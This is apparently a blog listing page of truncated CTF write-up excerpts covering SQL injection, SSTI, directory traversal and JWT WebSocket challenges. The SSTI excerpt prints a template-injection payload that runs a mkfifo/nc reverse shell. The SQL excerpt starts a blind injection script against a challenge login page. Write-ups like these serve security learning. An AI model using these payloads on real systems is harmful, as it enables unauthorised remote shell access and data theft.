1. SQL injection 2. file upload -> rcesql_exploit.py import requests import string import time url = 'http://vkl-sql.darkarmy.xyz/login.php' table_name = '' strings = 'abcdefghijklmnopqrstuvwxyzABCDEFGHJIJKLMNOPQRSTUVWXYZ1234567890{}' for i in range(1,80): for j in strings: #data = {'username':'admin" and if(ascii(substr((select schema_name from information_sc..
LAYER7 CTF Writeup - as3617 mic check - MISC (100pts) 개발자도구로 description 영역을 확인해보면 플래그가 있다. FLAG : LAYER7{SunriNIN73rN3thIGHScHOO1layEr7} zipzipzipzipzip - MISC (100pts) 압축파일을 열어보면 안에 또 압축파일이 있는데 손으로 하기 귀찮아서 shell script로 빠르게 풀었다. while [ "`find . -type f -name '*.zip' | wc -l`" -gt 0 ] do find . -type f -name "*.zip" -exec unzip -- '{}' \; -exec rm -- '{}' \; done 압축파일이 있는 폴더로 가서 위의 스크립트를 실행하면 ..
보호되어 있는 글입니다.
Migration 두 개의 링크를 주고 있다. http://migration.sstf.site:5555/ http://migration.sstf.site:7777/ 첫번째 링크에는 register가 포함되있고 두번째 링크는 로그인 후 admin 페이지를 제공해준다. 문제에서 주어진 파일을 보면 user의 정보를 포함하고 있는데 아래와 같이 이루어져 있다. idx user_id password 1 user1 c4ca4238a0b923820dcc509a6f75849b 2 user2 c81e728d9d4c2f636f067f89cc14862c 이때 password는 md5해쉬로 이루어져 있었고 user1의 password가 1인걸로 봐선 나머지 유저의 password도 id에 붙어있는 숫자라는 것을 추측해낼 수..
ascii-inbox The problem is giving two websites. 1.https://challs.m0lecon.it:8003/ - Inbox 2.https://challs.m0lecon.it:8004/ - Ascii The discription gave me 404 pages as a hint. I immediately thought of a ssti and tried an attack. I tried reverse shell and I could get shell. https://challs.m0lecon.it:8004/{{url_for.__globals__.os.popen('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc ip por..
대회시간에는 못풀었고 대회 끝나고 나서야 풀었다. 한 99퍼까지 다해놓고선 경험이 부족해서 못풀었다. 문제에 들어가면 귀여운 고양이 사진이 보인다. 일단 소스코드를 확인해보면 black grey red white not like sumthing? send it hier 위와 같이 코드가 되있는데 나는 http://catweb.zajebistyc.tf/cats?kind=이부분이 수상해보였고 접속해보니 다음과 같았다. kind 파라미터 값에 따라서 json형식으로 사진파일이름을 전달해주는 것 같았다. 아무거나 넣어보고 있었는데 ?kind=/형식으로 전달해주니 내부 디렉토리를 보는 것이 가능했다. 플래그는 templates폴더 내부에 존재했지만 flag.txt에 접근하는 것은 안됬다(404가 뜬다) 문제에서 ..
주창이형이 만든 문젠데 정말 잘 만든 문제라고 생각한다. 문제 푸면서 정말 재미있었다. 문제에서 소스코드를 주고 있다. 문제에 접속해보면 위와 같이 회원가입과 로그인하는 부분이 있다. 회원가입을 하고 로그인을 하면 Board와 글을 쓸 수 있는 부분이 있다. 일단 코드를 분석해보도록 하자. const wss = new WebSocketServer({ port: 3100, verifyClient: (info, cb) => { try { const token = info.req.headers.cookie.match(/jwtSession=([0-9a-zA-Z.\-_]*)/)[1] const res = jwt.jwtVerify(token) if (res) { info.req.id = res.id cb(true)..